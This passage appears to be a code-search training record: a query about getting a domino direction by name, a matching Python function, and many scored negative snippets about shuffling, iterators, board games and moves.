self.cycles_remaining -= 1\n domino.rotate_to(rotation)\n self.add(domino, x, y)\n self.add_count += 1\n has_even_gaps = self.hasEvenGaps()\n if not has_even_gaps:\n self.remove(domino)\n break\n else:\n if is_flipped:\n domino.flip()\n if not matches_allowed and domino.hasMatch():\n pass\n else:\n if self.fill(random,\n matches_allowed,\n reset_cycles=False):\n return True\n self.remove(domino)\n except BadPositionError:\n pass\n rotation = (rotation + 90) % 360\n return False", "def random_iterator(self, batch_size):\n all_indices = np.nonzero(np.logical_not(self._dones))[0]\n np.random.shuffle(all_indices)\n\n states = np.asarray(self._states)\n actions = np.asarray(self._actions)\n next_states = np.asarray(self._next_states)\n rewards = np.asarray(self._rewards)\n dones = np.asarray(self._dones)\n\n i = 0\n while i < len(all_indices):\n indices = all_indices[i:i+batch_size]\n\n yield states[indices], actions[indices], next_states[indices], rewards[indices], dones[indices]\n\n i += batch_size", "def iter_dist(self):\n self.makeTree()\n coords = self.coords\n sd = selfdistance\n for i in self.loopindices:\n dists, inds = self.nntree.query(coords[i], self.nnmaxcount,\n distance_upper_bound=self.nncutoff)\n yield coords[i], dists.compress((dists > sd) & ~np.isinf(dists))", "def iter_trios(self):\n for row in self._ped_tab.itertuples():\n if row.father == '0':\n continue\n if row.mother == '0':\n continue\n yield (row.sample_id, row.father, row.mother)", "def get_examples():\n symbols = get_symbols()\n symbol_start_indices, total_examples = _index_symbols(symbols)\n selection_order = np.arange(total_examples)\n np.random.shuffle(selection_order)\n for sample_index in selection_order:\n # use a binary search to determine which symbol to use given the sample_index\n start_index_index = bisect.bisect_left(symbol_start_indices, sample_index + 1) - 1\n start_index = symbol_start_indices[start_index_index]\n offset = sample_index - start_index\n symbol = symbols[start_index_index]\n time_series_data = get_time_series_data(symbol)\n next_day = time_series_data[offset]\n previous_days = time_series_data[offset + 1: offset + 1 + EXAMPLE_SIZE]\n previous_days.reverse()\n metadata = get_metadata_for_symbol(symbol)\n yield previous_days, next_day, metadata", "def __iter_test_indices(self, n_samples):\n if self.shuffle:\n np.random.seed(self.random_state)\n indices = np.random.permutation(n_samples)\n else:\n indices = np.arange(n_samples)\n\n fold_sizes = np.full(\n self.n_splits, n_samples // self.n_splits, dtype=int\n )\n fold_sizes[: n_samples % self.n_splits] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n mask = np.zeros(n_samples, dtype=bool)\n mask[indices[start:stop]] = True\n yield mask\n current = stop", "def in_random_order(data):\n indexes = [i for i, _ in enumerate(data)]\n random.shuffle(indexes)\n\n for i in indexes:\n yield data[i]", "def shuffleSites(myList):\n shuffle(myList)\n ctr = 0\n for x in myList:\n ctr += 1\n yield ctr, x", "def _all_donors(self, include_background=True):\n sheets = self.shortcut_sheets\n if not include_background:\n sheets = filter(is_not_background, sheets)\n for sheet in sheets:\n for entity in sheet.bio_entities.values():\n yield entity", "def in_random_order(data):\n idx = [i for i, _ in enumerate(data)]\n random.shuffle(idx)\n for i in idx:\n yield data[i]", "def randomDays(self):\n flag = False\n while not flag:\n r = np.floor(np.random.rand() * len(self.df.index))\n start = self.df.index[r]\n if 
r+self.daysHeld < len(self.df.index)-1:\n end = self.df.index[r+self.daysHeld]\n flag = True\n return (start,end)", "def random(self):\n adj = self.adjacent()\n self.switch(random.choice([pos for pos in adj if self.in_grid(pos) and pos != self.prev]))", "def _next_generation(self, ranks):\n replace = ranks[:int(self.population_size * self.culling)]\n for idx in replace:\n self.population[idx] = self._create_offspring()", "def pushDominoes(self, dominoes):\n if len(dominoes) < 2:\n return dominoes\n\n state = dominoes\n while True:\n next_state = self.domino_fall(state)\n if next_state == state:\n break\n state = next_state\n return state", "def _get_flips(self, origin, direction, color):\n #initialize variables\n flips = [origin]\n\n for x, y in OthelloBoard._increment_move(origin, direction, self.n):\n #print(x,y)\n if self[x][y] == 0:\n return []\n if self[x][y] == -color:\n flips.append((x, y))\n elif self[x][y] == color and len(flips) > 0:\n #print(flips)\n return flips\n\n return []", "def build_matches(self, noise=0):\n for player1_index in range(len(self.players)):\n for player2_index in range(player1_index, len(self.players)):\n pair = (\n self.players[player1_index], self.opponents[player2_index])\n match = self.build_single_match(pair, noise)\n yield (player1_index, player2_index), match", "def flip():\n return random.choice((True, False))", "def test_generator_method(self):\n for i in range(0, 4):\n yield self.try_odd, i", "def with_coordinates(self):\n for tweet in self.having(coordinates=self.default_coordinates):\n yield tweet", "def __iter__(self):\n return iter(self.use_random_var(Rotor, self.is_random, self.attribute_dict))", "def generate_moves(self, board: Board) -> typing.Iterator[MoveDescription]:\n dominoes = set(board.dominoes)\n for domino in dominoes:\n dx, dy = domino.direction\n yield from self.try_move(domino, dx, dy)\n yield from self.try_move(domino, -dx, -dy)" ]
[ "0.7208414", "0.5903002", "0.5236969", "0.47793296", "0.4773952", "0.47145683", "0.46093652", "0.4590172", "0.45812768", "0.45804274", "0.45732227", "0.45460996", "0.4520758", "0.4515188", "0.44946986", "0.4483429", "0.44739068", "0.446823", "0.4457632", "0.44459644", "0.44172007", "0.44098523", "0.44016644", "0.43887493", "0.4369217", "0.4361114", "0.4327133", "0.43211195", "0.43160895", "0.4309812" ]
0.8199502
0
Get a direction by name.
def get_direction(self, name): index = Domino.direction_names.find(name) return Domino.directions[index]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def match_direction(self, string):\r\n return Direction.query(\r\n or_(Direction.name == string, Direction.short_name == string)\r\n ).first()", "def getDirection(self, direction: str):\n return direction", "def get_direction(self, start_direction, **kwargs):\n return self.directions.get(start_direction)", "def get_by_name(self, name):\n return self.by_name.get(name.upper())", "def get(self, name, _marker=None):\n return self._forward.get(name.lower(), _marker)", "def getDirection (self, time):\n return self._response.getDirection(time)", "def get_direction(self, start_direction):\n if not self.directions:\n neighbors = self.get_linked_neighbors()\n\n if len(neighbors) != 1:\n raise MapParserError(\"must have exactly one link connected to it.\", self)\n direction, link = next(iter(neighbors.items()))\n if hasattr(link, \"node_index\"):\n raise MapParserError(\n \"can only connect to a Link. Found {link} in direction {direction}.\", self\n )\n # the string 'teleport' will not be understood by the traverser, leading to\n # this being interpreted as an empty target and the `at_empty_target`\n # hook firing when trying to traverse this link.\n direction_name = self.direction_name\n if start_direction == direction_name:\n # called while traversing another teleport\n # - we must make sure we can always access/leave the teleport.\n self.directions = {direction_name: direction, direction: direction_name}\n else:\n # called while traversing a normal link\n self.directions = {start_direction: direction_name, direction_name: direction}\n\n return self.directions.get(start_direction)", "def _get_direction(self, action, direction):\n left = [2,3,1,0]\n right = [3,2,0,1]\n if direction == 0:\n new_direction = action\n elif direction == -1:\n new_direction = left[action]\n elif direction == 1:\n new_direction = right[action]\n else:\n raise Exception(\"getDir received an unspecified case\")\n return new_direction", "def get_direction(self):\n return self.direction", "def get_direction(self) -> int: \r\n if time.time() > self.stop_timer:\r\n return Directions.stop\r\n else:\r\n return self.direction", "def get_direction_for_dirtag(dirtag):\n dir = dirtag.find(\"OB\");\n if dir < 0: dir = \"Inbound\"\n else: dir = \"Outbound\"\n\n cur = get_cursor();\n SQLExec(cur,\n \"\"\"Select direction_id from gtfs_directions \n where description=%(dir)s\"\"\",\n {'dir':dir});\n ret = cur.next()[0];\n \n cur.close();\n return ret;", "def getDirection(lang):\n return ('ltr', 'rtl')[languages[lang][DIRECTION]]", "def find_next_room(self, direction):\n name_of_room = getattr(self.current_location, direction)\n return globals()[name_of_room]", "def find_next_room(self, direction):\n name_of_room = getattr(self.current_location, direction)\n return globals()[name_of_room]", "def get_direction(self):\r\n return self.__direction", "def get_direction_to_right(self, direction):\r\n return direction_to_right[direction]", "def direction(self) -> Optional[str]:\n return self._direction", "def tryDirection(d, currentRoom):\n attrib = d + '_to'\n\n # See if the room has the destination attribute\n if hasattr(currentRoom, attrib):\n # If so, return its value (the next room)\n return getattr(currentRoom, attrib)\n\n # Otherwise print an error and stay in the same room\n print(\"Where do you think your going?\")\n\n return currentRoom", "def find_by_name(self, name):\n return self.get(name)", "def compute_direction(self, feats):\n if feats.name == \"ARNC\":\n if feats[\"z-score\"] < -1.5:\n return Directions.long_dir\n elif 
feats[\"z-score\"] > 1.5:\n return Directions.short_dir\n elif feats.name == \"UNG\":\n if feats[\"z-score\"] < -1.5:\n return Directions.short_dir\n elif feats[\"z-score\"] > 1.5:\n return Directions.long_dir", "def direction(d, current_room):\n key = d + \"_to\"\n\n if key not in rooms[current_room]:\n print(\"You can't go that way.\")\n return current_room\n\n destination = rooms[current_room][key]\n\n return destination", "def get_chase_direction(self, options):\n pick_direction = None\n target_pos = (self.target.rect.centerx, self.target.rect.centery)\n test = (abs(target_pos[0]), abs(target_pos[1]))\n prefer = test.index(max(test[0], test[1]))\n if prefer == 0: # x direction\n if target_pos[prefer] < self.rect.centerx: # to the left\n pick_direction = 'l'\n elif target_pos[prefer] > self.rect.centerx: # to the right\n pick_direction = 'r'\n else: # y direction\n if target_pos[prefer] < self.rect.centery: # upward\n pick_direction = 'u'\n elif target_pos[prefer] > self.rect.centery: # downward\n pick_direction = 'd'\n if pick_direction not in options: # desired direction not available\n if 'u' in options: # pick a direction that is available\n return 'u'\n if 'l' in options:\n return 'l'\n if 'r' in options:\n return 'r'\n if 'd' in options:\n return 'd'\n else: # desired direction available, return it\n return pick_direction", "def get_direction(strategy_context):\n direction_param = strategy_context['strategy']['opt_params'][0]\n\n if 'direction' in strategy_context['strategy']:\n warnings.warn(\"'direction' parameter in strategy_context['strategy']['direction'] is obsolete, \"\n \"please remove it to suppress this warning\")\n\n if direction_param.name.lower() != 'direction':\n raise ValueError('First OptParam of strategy must be Direction')\n\n for dir_value in direction_param.array:\n if dir_value != -1 and dir_value != 1:\n raise ValueError(\"Direction OptParam value must be -1 or 1\")\n\n if len(direction_param.array) == 1:\n if direction_param.array[0] == 1:\n return 1, 'Long'\n elif direction_param.array[0] == -1:\n return -1, 'Short'\n\n elif len(direction_param.array) == 2:\n return 0, 'Bidir'\n else:\n raise ValueError(\"Direction OptParam must contain 1 or 2 elements\")", "def direction(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"direction\")", "def get_room_by_name(name: str, context: 'GameContext') -> Room | None:\n for room in context.rooms:\n if room.name == name:\n return room\n\n # return None # default", "async def direction(self, value) -> str:\n if value is None:\n return \"N\"\n\n direction_array = [\n \"N\",\n \"NNE\",\n \"NE\",\n \"ENE\",\n \"E\",\n \"ESE\",\n \"SE\",\n \"SSE\",\n \"S\",\n \"SSW\",\n \"SW\",\n \"WSW\",\n \"W\",\n \"WNW\",\n \"NW\",\n \"NNW\",\n \"N\",\n ]\n direction_str = direction_array[int((value + 11.25) / 22.5)]\n return self._translations[\"wind_dir\"][direction_str]", "def get_by_name(cls, name):\n return cls.query.filter(cls.name == name).first()", "def isDir(n):\n assert isinstance(n, int) or isinstance(n, str) or isinstance(n, Direction), 'incorrect type of arg n: should be type int, str or Direction, is type {}'.format(type(n))\n dd = n in Direction.directions.keys()\n ds = n in Direction.directions.values()\n return dd or ds or isinstance(n, Direction)", "def lookup_by_name(cls, name):\n return cls.__by_name[name]", "def get_room(self, name):\n for i in self.rooms:\n if self.rooms[i].name == name:\n return self.rooms[i]\n raise RuntimeError, \"Room '%s' not known\" % name" ]
[ "0.65444416", "0.644363", "0.6317267", "0.58342814", "0.5821944", "0.5821525", "0.57715315", "0.57485586", "0.56602365", "0.56146896", "0.56140655", "0.5608703", "0.5557051", "0.5557051", "0.55225646", "0.54623437", "0.54026246", "0.5378701", "0.5376569", "0.5370104", "0.5360129", "0.5360028", "0.5336181", "0.5322964", "0.53166443", "0.5289803", "0.5281358", "0.52687085", "0.52671045", "0.52629435" ]
0.81401694
0
True if either cell matches one of its neighbours. Slightly different type of matching from isMatch().
def hasMatch(self): for cell in (self.head, self.tail): for neighbour in cell.find_neighbours(): if neighbour.pips == cell.pips: return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_neighbours(self):\n for p in self.targetCell.possibilities:\n if p != 0:\n if p not in self.targetCell.row_neighbour_possibilities:\n self.targetCell.solve(p)\n return True\n elif p not in self.targetCell.column_neighbour_possibilities:\n self.targetCell.solve(p)\n return True\n elif p not in self.targetCell.box_neighbour_possibilities:\n self.targetCell.solve(p)\n return True\n return False", "def is_at_intersection(self):\n directions = 0\n self.tile = (self.get_nearest_row(), self.get_nearest_col())\n if self.internal_map[self.tile[0] - 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0] + 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] - 1] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] + 1] not in ('x', ):\n directions += 1\n return True if directions > 2 else False", "def is_neighbour(self, other, diagonal):\n return other in self.neighbours(diagonal)", "def search_grid(grid1, grid2, i, j):\n if i < 0 or j < 0 or i >= len(grid1) or j >= len(grid1[0]): # boundary check\n return True\n match = grid1[i][j] == grid2[i][j]\n if grid1[i][j] == 0 or grid2[i][j] == 0:\n return match\n # once a cell becomes a part of a matching region, set it to 0. This makes sure that the cell\n # is not counted for another matching region.\n grid1[i][j] = 0\n grid2[i][j] = 0\n match = search_grid(grid1, grid2, i - 1, j) and match\n match = search_grid(grid1, grid2, i, j - 1) and match\n match = search_grid(grid1, grid2, i + 1, j) and match\n match = search_grid(grid1, grid2, i, j + 1) and match\n return match", "def has_neighbor(self, tile: 'games.saloon.tile.Tile') -> bool:\n return bool(tile and tile in self.get_neighbors())", "def exist_adjacent_cell(board: list, cell_index: tuple) -> bool:\n #Each time the result = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1)]\n possible_cells_direction = list(filter(lambda x: x[0] != 0 or x[1] != 0, list(product(range(-1, 2), range(-1, 2)))))\n\n for coord_couple in possible_cells_direction:\n i = cell_index[0] + coord_couple[0]\n j = cell_index[1] + coord_couple[1]\n\n if not test_cell_existence(board, i, j):\n continue\n\n # If a cell isn't empty\n if board[i][j] != 0:\n return True\n return False", "def point_in_ship(ships, coor):\n for ship in ships:\n if coor in ship.coordinates or coor in ship.neighbor:\n return True\n return False", "def main(board, word):\r\n for i, row in enumerate(board):\r\n for j, square in enumerate(row):\r\n if square == word[0]:\r\n res = neighbors(board, word, i, j)\r\n if res:\r\n return True\r\n return False", "def is_adjacent(self, other: ops.Qid) -> bool:\n return (isinstance(other, GridQubit) and\n abs(self.row - other.row) + abs(self.col - other.col) == 1)", "def square2_checker(self, x, y, row2, col2):\n \n self.x = x\n self.y = y\n self.row2 = row2\n self.col2 = col2\n\n return abs(self.x - self.row2) == 1 and self.col2 == self.y \\\n or abs(self.y - self.col2) == 1 and self.row2 == self.x", "def matched_neighbors(coord, second_char, matrix, row_length, column_length):\n row_number, column_number = coord\n neighbors_coordinates = [(row, column) for row in xrange(row_number - 1, row_number + 2)\n for column in xrange(column_number - 1, column_number + 2)\n if row_length > row >= 0 and column_length > column >= 0\n and coord_char((row, column), matrix) == second_char\n and not (row, column) == coord]\n\n return neighbors_coordinates", "def is_adjacent(v1, v2):\n return 
(v2 in _board_graph[v1])", "def __eq__(self, other):\n try:\n return self.row == other.row and self.col == other.col\n except AttributeError: # Can also take a tuple (row, col)\n return self.row == other[0] and self.col == other[1]", "def is_cell_on_board(cell, board_shape): # TODO: Remove\n return (0, 0) <= cell < board_shape", "def __eq__(self, other):\n\n return(self.cell == other.cell and\n self._lastUsedIteration == other._lastUsedIteration and\n (sorted(self.__synapses, key=lambda x: x._ordinal) ==\n sorted(other.__synapses, key=lambda x: x._ordinal)))", "def is_match(cells):\n if len(cells) == 1 and \"-\" not in cells:\n return list(cells)[0]\n return None", "def point_in_between(ob, row, cell, other_cell):\n if row:\n left = other_cell[0] < cell[0]\n if left:\n return ob.patt[0] == 1\n else:\n return ob.patt[2] == 1\n below = other_cell[1] < cell[1]\n if below:\n return ob.patt[1] == 0\n else:\n return ob.patt[1] == 2", "def test_cell_existence(board: list, i: int, j: int) -> bool:\n return not (i < 0 or i > len(board)-1 or j < 0 or j > len(board)-1)", "def isIn(self, coor, rec):\n x, y = coor[0], coor[1]\n top, bottom, left, right = rec[1][1], rec[0][1], rec[0][0], rec[1][0]\n # print(top, bottom, left, right)\n if left <= x <= right and bottom <= y <= top:\n return True\n else:\n return False", "def __eq__(self, other):\n return other and self.cells == other.cells", "def any_possible_moves(grid):\n if get_empty_cells(grid):\n return True\n for row in grid:\n if any(row[i]==row[i+1] for i in range(len(row)-1)):\n return True\n for i,val in enumerate(grid[0]):\n column = get_column(grid, i)\n if any(column[i]==column[i+1] for i in range(len(column)-1)):\n return True\n return False", "def _intersectionmatch(min_coord_im,max_coord_im,min_coord_zip,max_coord_zip):\n return min_coord_im < max_coord_zip and max_coord_im > min_coord_zip", "def has_connection_right(tile):\n return is_kth_bit_set(tile, 3)", "def edge_between_neighbors(cell_a, cell_b):\n edge = np.logical_and(dilate_simple(cell_a), dilate_simple(cell_b))\n return edge", "def any_possible_moves(grid):\n\tif get_empty_cells(grid):\n\t\treturn True\n\tfor row in grid:\n\t\tif any(row[i]==row[i+1] for i in range(len(row)-1)):\n\t\t\treturn True\n\tfor i,val in enumerate(grid[0]):\n\t\tcolumn = get_column(grid, i)\n\t\tif any(column[i]==column[i+1] for i in range(len(column)-1)):\n\t\t\treturn True\n\treturn False", "def matches(self, other):\n return ( all([i==j or i<0 or j<0 for i, j in zip(self._data, other._data)])\n and len(self._data) == len(other._data) )", "def fn(i):\n for j in range(n):\n if grid[i][j] and not seen[j]: \n seen[j] = True\n if match[j] == -1 or fn(match[j]): \n match[j] = i\n return True \n return False", "def neighboursContains(board, row, column, piece):\n\n neighboursList = []\n for rowIndex, columnIndex in BoardUtils.DIRECTIONS.values():\n if 0 <= row + rowIndex < len(board) and 0 <= column + columnIndex < len(board[0]):\n neighboursList.append((row + rowIndex, column + columnIndex))\n\n for rowIndex, columnIndex in neighboursList:\n if board[rowIndex][columnIndex] == piece:\n return True\n return False", "def findRep(self, rep, cell = 1):\n\n if type(rep) == list: rep = np.array(rep)\n print(rep)\n if cell == 1:\n match = np.all(np.all(self.rep_1 == rep, axis = 2), axis = 1)\n elif cell == 2:\n match = np.all(np.all(self.rep_2 == rep, axis = 2), axis = 1) \n\n return match", "def _cell_in_boundary(self, i_row, i_col):\n return ((i_row, i_col) == self._tl_cell or\n (i_row, i_col) == self._tr_cell 
or\n (i_row, i_col) == self._bl_cell or\n (i_row, i_col) == self._br_cell or\n (i_row, i_col) in self._ls_cells or\n (i_row, i_col) in self._rs_cells or\n (i_row, i_col) in self._ts_cells or\n (i_row, i_col) in self._bs_cells)" ]
[ "0.6724939", "0.65565187", "0.651675", "0.6491993", "0.64436924", "0.64371634", "0.64162314", "0.64157915", "0.64040434", "0.64029574", "0.6330807", "0.6311212", "0.62970114", "0.625364", "0.6251876", "0.62480813", "0.6242117", "0.62384665", "0.6207678", "0.6207055", "0.6169609", "0.61415184", "0.6140069", "0.61275786", "0.6115166", "0.6114095", "0.61119616", "0.61097664", "0.6094244", "0.60871965" ]
0.7738691
0
Move a domino and calculate the new board state. Afterward, put the board back in its original state.
def move(self, domino, dx, dy) -> typing.Tuple[str, int]: domino.move(dx, dy) try: board = domino.head.board if not board.is_connected(): raise BadPositionError('Board is not connected.') if board.has_loner(): raise BadPositionError('Board has a lonely domino.') remaining = self.check_progress(board) return board.display(cropped=True), remaining finally: domino.move(-dx, -dy)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def move(self, domino, dx, dy, offset=None):\n matching_dominoes = set()\n complement_found = False\n domino.move(dx, dy)\n board = domino.head.board\n try:\n if not board.is_connected():\n raise BadPositionError('Board is not connected after move.')\n for cell in (domino.head, domino.tail):\n for neighbour in cell.find_neighbours():\n if neighbour.pips == cell.pips:\n matching_dominoes.add((neighbour.domino,\n neighbour.domino.head.x,\n neighbour.domino.head.y))\n complement_found = (complement_found or\n neighbour.pips + cell.pips == 6)\n if matching_dominoes:\n matching_dominoes.add((domino, domino.head.x, domino.head.y))\n elif not complement_found:\n raise BadPositionError(\n 'A legal move must have captures or complements.')\n for matching_domino, _, _ in matching_dominoes:\n board.remove(matching_domino)\n if not board.is_connected():\n raise BadPositionError('Board is not connected after capture.')\n cropping_bounds = [] if offset is not None else None\n new_state = board.display(cropped=True,\n cropping_bounds=cropping_bounds)\n remaining = self.check_progress(board)\n if offset is not None:\n offset[0] -= cropping_bounds[0]\n offset[1] -= cropping_bounds[1]\n return new_state, remaining\n finally:\n for matching_domino, x, y in matching_dominoes:\n board.add(matching_domino, x, y)\n domino.move(-dx, -dy)", "def move(self, board):\n raise NotImplementedError", "def move(self, board):\n # first, make your turn:\n currentState = board[self.x,self.y]\n turnDir = self.rule[(currentState + 1) % len(self.rule)]\n self.turn( int(turnDir) )\n # next, let's change this cell's state:\n if currentState >= len(self.rule) - 1:\n board[self.x,self.y] = 0\n else:\n board[self.x,self.y] = currentState + 1\n # and let's move:\n offsets = self.nextPositionOffset() # based on x, y, and dir\n self.x, self.y = board.move(self.x, self.y, offsets[0], offsets[1])", "def domove(self, depart, arrivee, promote):\n\n # Debugging tests\n # if(self.cases[depart].isEmpty()):\n # print('domove() ERROR : asked for an empty square move : ',depart,arrivee,promote)\n # return \n # if(int(depart)<0 or int(depart)>63):\n # print('domove() ERROR : incorrect FROM square number : ',depart)\n # return \n # if(int(arrivee)<0 or int(arrivee)>63):\n # print('domove() ERROR : incorrect TO square number : ',arrivee)\n # return\n # if(not(promote=='' or promote=='q' or promote=='r' or promote=='n' or promote=='b')):\n # print('domove() ERROR : incorrect promote : ',promote)\n # return\n\n # Informations to save in the history moves\n pieceDeplacee = self.cases[depart] # moved piece\n piecePrise = self.cases[arrivee] # taken piece, can be null : Piece()\n isEp = False # will be used to undo a ep move\n histEp = self.ep # saving the actual ep square (-1 or square number TO)\n hist_roque_56 = self.white_can_castle_56\n hist_roque_63 = self.white_can_castle_63\n hist_roque_0 = self.black_can_castle_0\n hist_roque_7 = self.black_can_castle_7\n flagViderEp = True # flag to erase ep or not : if the pawn moved is not taken directly, it can't be taken later\n\n # Moving piece\n self.cases[arrivee] = self.cases[depart]\n self.cases[depart] = Piece()\n\n self.ply += 1\n\n # a PAWN has been moved -------------------------------------\n if (pieceDeplacee.nom == 'PION'):\n\n # White PAWN\n if (pieceDeplacee.couleur == 'blanc'):\n\n # If the move is \"en passant\"\n if (self.ep == arrivee):\n piecePrise = self.cases[arrivee + 8] # take black pawn\n self.cases[arrivee + 8] = Piece()\n isEp = True\n\n # The white pawn moves 2 squares from 
starting square\n # then blacks can take \"en passant\" next move\n elif (self.ROW(depart) == 6 and self.ROW(arrivee) == 4):\n self.ep = arrivee + 8\n flagViderEp = False\n\n # Black PAWN\n else:\n\n if (self.ep == arrivee):\n piecePrise = self.cases[arrivee - 8]\n self.cases[arrivee - 8] = Piece()\n isEp = True\n\n elif (self.ROW(depart) == 1 and self.ROW(arrivee) == 3):\n self.ep = arrivee - 8\n flagViderEp = False\n\n # a ROOK has been moved--------------------------------------\n # update castle rights\n\n elif (pieceDeplacee.nom == 'TOUR'):\n\n # White ROOK\n if (pieceDeplacee.couleur == 'blanc'):\n if (depart == 56):\n self.white_can_castle_56 = False\n elif (depart == 63):\n self.white_can_castle_63 = False\n\n # Black ROOK\n else:\n if (depart == 0):\n self.black_can_castle_0 = False\n elif (depart == 7):\n self.black_can_castle_7 = False\n\n # a KING has been moved-----------------------------------------\n\n elif (pieceDeplacee.nom == 'ROI'):\n\n # White KING\n if (pieceDeplacee.couleur == 'blanc'):\n\n # moving from starting square\n if (depart == 60):\n # update castle rights\n self.white_can_castle_56 = False\n self.white_can_castle_63 = False\n\n # If castling, move the rook\n if (arrivee == 58):\n self.cases[56] = Piece()\n self.cases[59] = Piece('TOUR', 'blanc')\n\n elif (arrivee == 62):\n self.cases[63] = Piece()\n self.cases[61] = Piece('TOUR', 'blanc')\n\n # Black KING\n else:\n\n if (depart == 4):\n self.black_can_castle_0 = False\n self.black_can_castle_7 = False\n\n if (arrivee == 6):\n self.cases[7] = Piece()\n self.cases[5] = Piece('TOUR', 'noir')\n\n elif (arrivee == 2):\n self.cases[0] = Piece()\n self.cases[3] = Piece('TOUR', 'noir')\n\n # End pieces cases-----------------------------------------------\n\n # Any move cancels the ep move\n if (flagViderEp == True):\n self.ep = -1\n\n # Promote : the pawn is changed to requested piece\n if (promote != ''):\n if (promote == 'q'):\n self.cases[arrivee] = Piece('DAME', self.side2move)\n elif (promote == 'r'):\n self.cases[arrivee] = Piece('TOUR', self.side2move)\n elif (promote == 'n'):\n self.cases[arrivee] = Piece('CAVALIER', self.side2move)\n elif (promote == 'b'):\n self.cases[arrivee] = Piece('FOU', self.side2move)\n\n # Change side to move\n self.changeTrait()\n\n # Save move to the history list\n self.history.append((depart, \\\n arrivee, \\\n pieceDeplacee, \\\n piecePrise, \\\n isEp, \\\n histEp, \\\n promote, \\\n hist_roque_56, \\\n hist_roque_63, \\\n hist_roque_0, \\\n hist_roque_7))\n\n # If the move lets king in check, undo it and return false\n if (self.in_check(self.oppColor(self.side2move))):\n self.undomove()\n return False\n\n return True", "def make_move(self, move, player, board):\r\n #nBoard = board.copy()\r\n board[move] = player\r\n for d in core.DIRECTIONS:\r\n if self.find_bracket(move, player, board, d)!=None:\r\n self.make_flips(move, player, board, d)\r\n return board", "def moved_board(board):\n return legal_move_on(board=board).map(\n lambda (start, end): board.move(start=start, end=end),\n )", "def make_move(self, state):\r\n # intially set drop phase to true\r\n drop_phase = True\r\n move = [] # list to make moves with to return\r\n succ = self.succ(state) # get the successor of this state\r\n # intial postion of board to set up most advantagous spot if its empty\r\n if sum(x.count(self.my_piece) for x in self.board) == 0 and self.board[2][2] == ' ':\r\n move.insert(0, (2, 2))\r\n return move\r\n \r\n # check the number of 'r' and 'b' on board if theres 4 of each drop phase is 
false\r\n if sum(x.count('r') for x in self.board) == 4 and sum(x.count('b') for x in self.board) == 4:\r\n drop_phase = False\r\n\r\n # if not during drop phase use minimax to make next move from one postion to next\r\n if not drop_phase:\r\n move = []\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n f = d['from']\r\n s = sorted(succ, key=lambda e: e['f'])\r\n moveto = s[-1]\r\n move.insert(1, (moveto['from'][0], moveto['from'][1]))\r\n move.insert(0, (moveto['pos'][0], moveto['pos'][1]))\r\n return move # return the from, to move\r\n\r\n else: #else use minimax and to make move during drop phase selecting spot to place AI piece\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n hold = []\r\n move = []\r\n n = None\r\n hold = []\r\n for s in succ:\r\n p = s['pos'][0]\r\n p1 = s['pos'][1]\r\n if s['f'] == val and state[p][p1] == ' ':\r\n hold.append(s)\r\n if len(hold) == 1:\r\n row = hold[0]['pos'][0]\r\n col = hold[0]['pos'][1]\r\n else:\r\n f = sorted(hold, key=lambda e: e['pos'])\r\n row = f[0]['pos'][0]\r\n col = f[0]['pos'][1]\r\n\r\n move.insert(0, (row, col)) # return the move \r\n return move", "def apply_move(self, move):\r\n next_board = copy.deepcopy(self.board)\r\n next_board.place(self.next_player, move)\r\n return GameState(next_board, self.next_player.other, move)", "def move(self, board):\n\n if board.get_number_of_moves() == 0:\n random_row = randint(0, 2)\n random_column = randint(0, 2)\n\n if random_row == 1 or random_column == 1:\n random_row = 1\n random_column = 1\n elif random_row == 2:\n random_row = board.get_dimension()-1\n\n if random_column == 2:\n random_column = board.get_dimension()-1\n\n move = (random_row, random_column)\n elif board.get_number_of_moves() == 1 or board.get_number_of_moves() == 2:\n if board.get_piece(1,1) == ' ':\n move = (1, 1)\n else:\n board_dimension = board.get_dimension()-1\n corners = [(0, 0), (0, board_dimension), (board_dimension, 0), (board_dimension, board_dimension)]\n corners = self.remove_filled_positions(corners, board)\n\n move = corners[randint(0, len(corners)-1)]\n else:\n move = self.check_for_winner(board)\n\n if move == (-1, -1):\n board_dimension = board.get_dimension()-1\n corner1_moves = self.remove_filled_positions([(0, 0), (2, 2)], board)\n corner2_moves = self.remove_filled_positions([(0, 2), (2, 0)], board)\n\n non_corner_moves = self.remove_filled_positions([(1, 0), (2, 1), (1, 2), (0, 1)], board)\n\n center_piece = board.get_piece(1, 1)\n corner_pieces = [board.get_piece(0, 0), board.get_piece(board_dimension, 0), board.get_piece(0, board_dimension), board.get_piece(board_dimension, board_dimension)]\n\n if corner_pieces[0] != self._piece and corner_pieces[0] != ' ' and corner_pieces[0] == corner_pieces[3]:\n move = non_corner_moves[randint(0, 3)]\n elif corner_pieces[1] != self._piece and corner_pieces[1] != ' ' and corner_pieces[1] == corner_pieces[2]:\n move = non_corner_moves[randint(0, 3)]\n elif len(corner2_moves) > 0 and corner_pieces[0] != self._piece and corner_pieces[0] == center_piece and corner_pieces[3] == self._piece:\n move = corner2_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[1] != self._piece and corner_pieces[1] == center_piece and corner_pieces[2] == self._piece:\n move = corner1_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[2] != self._piece and corner_pieces[2] == center_piece and corner_pieces[1] == self._piece:\n move = corner1_moves[0]\n elif len(corner2_moves) > 0 and 
